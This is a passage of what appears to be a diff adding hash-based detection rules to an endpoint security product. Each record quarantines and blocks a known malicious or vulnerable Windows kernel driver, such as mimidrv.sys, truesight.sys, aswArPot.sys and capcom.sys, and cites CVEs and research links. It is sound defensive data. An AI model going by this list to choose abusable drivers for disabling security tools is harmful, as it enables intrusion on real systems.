+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.468665Z",
+ "creation_date": "2026-03-23T11:45:30.468668Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.468676Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4f5166322f578fb111b6f2af375052008a5263311890f85c3e4ebc9c0f85affa",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "92291545-1709-5502-92ef-498140151941",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.968827Z",
+ "creation_date": "2026-03-23T11:45:29.968829Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.968834Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0f016c80c4938fbcd47a47409969b3925f54292eba2ce01a8e45222ce8615eb8",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "922c9706-07dd-5a3a-b0af-a56cea120412",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.150616Z",
+ "creation_date": "2026-03-23T11:45:31.150618Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.150624Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f007a84ac447535f44a5c473c73216d51b9bc597842a53eb292174bcc5ebaf73",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "922d36cf-2ab9-5075-84ce-fe8acc60c530",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.465850Z",
+ "creation_date": "2026-03-23T11:45:30.465853Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.465863Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a1e6b431534258954db07039117b3159e889c6b9e757329bbd4126383c60c778",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "922fc46f-1aa7-579a-ade9-6b5688d38fe4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.978894Z",
+ "creation_date": "2026-03-23T11:45:29.978896Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.978902Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7f0eef1ed4c1278372348cb52e27dc3aa2f51a8b6a62db39d2af75031e55a8db",
+ "comment": "Vulnerable Kernel Driver (aka LgCoreTemp.sys) [https://www.loldrivers.io/drivers/2c3884d3-9e4f-4519-b18b-0969612621bc/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "92302192-bd99-5149-ac27-6fd880d11b5c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.150321Z",
+ "creation_date": "2026-03-23T11:45:31.150323Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.150329Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ff4952837ec7e41feb582897123a7632c41d98d545ebe7936e1024972254ba07",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9232ee15-20b1-51c0-a21a-6473049d3b51",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.828837Z",
+ "creation_date": "2026-03-23T11:45:31.828839Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.828844Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "515b1433d863c3c302442c23767325200edef64fab958eb59c6d00f319d473ea",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "925d698f-6af8-5f7a-8c71-8667641d520b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.622088Z",
+ "creation_date": "2026-03-23T11:45:29.622090Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.622095Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "da6ca1fb539f825ca0f012ed6976baf57ef9c70143b7a1e88b4650bf7a925e24",
+ "comment": "CapCom vulnerable driver (aka capcom.sys and smep_capcom.sys) [https://github.com/tandasat/ExploitCapcom] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9260e827-f00e-58f0-880f-e0ef15070889",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.491629Z",
+ "creation_date": "2026-03-23T11:45:31.491632Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.491640Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0a5714bad41aae347b76b8ecc202d5ae92b3c19816b2bf3214fe613a4bdc9995",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "926a7831-82b0-59d6-8683-d5feb1113562",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.493198Z",
+ "creation_date": "2026-03-23T11:45:31.493201Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.493210Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "024831aba0bd668e0cdf8ec29eee4fcec329ff821b2baa38eda4915f4b9c0837",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "926cc190-8416-5aee-871a-544c57246f77",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.820980Z",
+ "creation_date": "2026-03-23T11:45:30.820983Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.820996Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "423f052690b6b523502931151dfcc63530e3bd9d79680f9b5ac033b23b5c6f18",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9275f722-0cd8-5907-a3b7-fec782a7edd7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.809622Z",
+ "creation_date": "2026-03-23T11:45:31.809625Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.809633Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e8fdda338b7f5232978e2a1cbe4b67be0130164dc7e548ee6e555e09aa917f24",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "927606ae-6753-5b07-9c4d-83aa79ce99d0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.823422Z",
+ "creation_date": "2026-03-23T11:45:30.823425Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.823434Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "98ebd924e01b6853307377855678ac6a64544ab3614eafff7b6f5df6ed3066ff",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "92763c03-2760-5d9c-80db-37bd8f8f4769",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.499135Z",
+ "creation_date": "2026-03-23T11:45:31.499138Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.499146Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "87881cfe09f0f5b5b1a2a1bee260c050940ab35df241099a404cc13a036b7b13",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "92933035-4108-59a6-9518-209e17bb6ab2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.974627Z",
+ "creation_date": "2026-03-23T11:45:29.974629Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.974634Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d74599ab8960f16e8026dcd564c5407956444c46c3dea6b38b1c243fbbbdc517",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "92959c3d-331a-5bea-8e28-bd75f3730f2a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.828991Z",
+ "creation_date": "2026-03-23T11:45:30.828993Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.828998Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b1fe6090645df9221ce904c212c5583d1eae6d20cf3292d0abeb4acbe16dbd9b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9299b33e-70d1-52c9-83a3-8b6565b34409",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.153202Z",
+ "creation_date": "2026-03-23T11:45:31.153205Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.153214Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5f575506837941d91025f94e839bd0b533b01dab253efea0c4a7f9fbd89e2958",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "92a1fd96-4d0c-5cb8-bd6b-dccee5941d96",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.143024Z",
+ "creation_date": "2026-03-23T11:45:31.143026Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.143031Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e08def1e56b5433b999448d4476a7496355cbfdac1a90bd8948bd8f237225f40",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "92a8c966-b8db-5336-a856-1d5906dfda2e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.493239Z",
+ "creation_date": "2026-03-23T11:45:31.493241Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.493247Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d08ae4dc2cac242c70820beca3c2977d8af9b8ea9e8611fe0488b9fc1159a415",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "92af07f2-e509-5484-9adc-217cdde7b514",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.458465Z",
+ "creation_date": "2026-03-23T11:45:30.458468Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.458477Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0f4ca9e9507724526f2b624d165750344473d388da38b7f3f6a8366dbc15140b",
+ "comment": "Vulnerable Kernel Driver (aka nscm.sys) [https://www.loldrivers.io/drivers/351ff5ca-f07b-4eb6-9300-d5d31514defb/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "92bb21fb-6c71-541d-9f5b-177bd33bdaa6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.144353Z",
+ "creation_date": "2026-03-23T11:45:32.144355Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.144361Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "af5a2122b55ee9d8cd3dd49c4ac41bfc9b354912480f06fa7de19829c00c2720",
+ "comment": "Malicious Kernel Driver (aka idmtdi.sys) [https://www.loldrivers.io/drivers/c2e98102-2055-48f0-9449-3e7a7f2c0ffe/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "92bb419b-04db-5e2e-889e-3dc2c8e7cf0a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.479334Z",
+ "creation_date": "2026-03-23T11:45:31.479339Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.479349Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7f9f420e780b3d7a836c09eef910546389310d8bf1ccc7104f711b0430407c2d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "92c5369f-65df-5782-a9b4-ceccba8358dc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.830969Z",
+ "creation_date": "2026-03-23T11:45:30.830972Z",
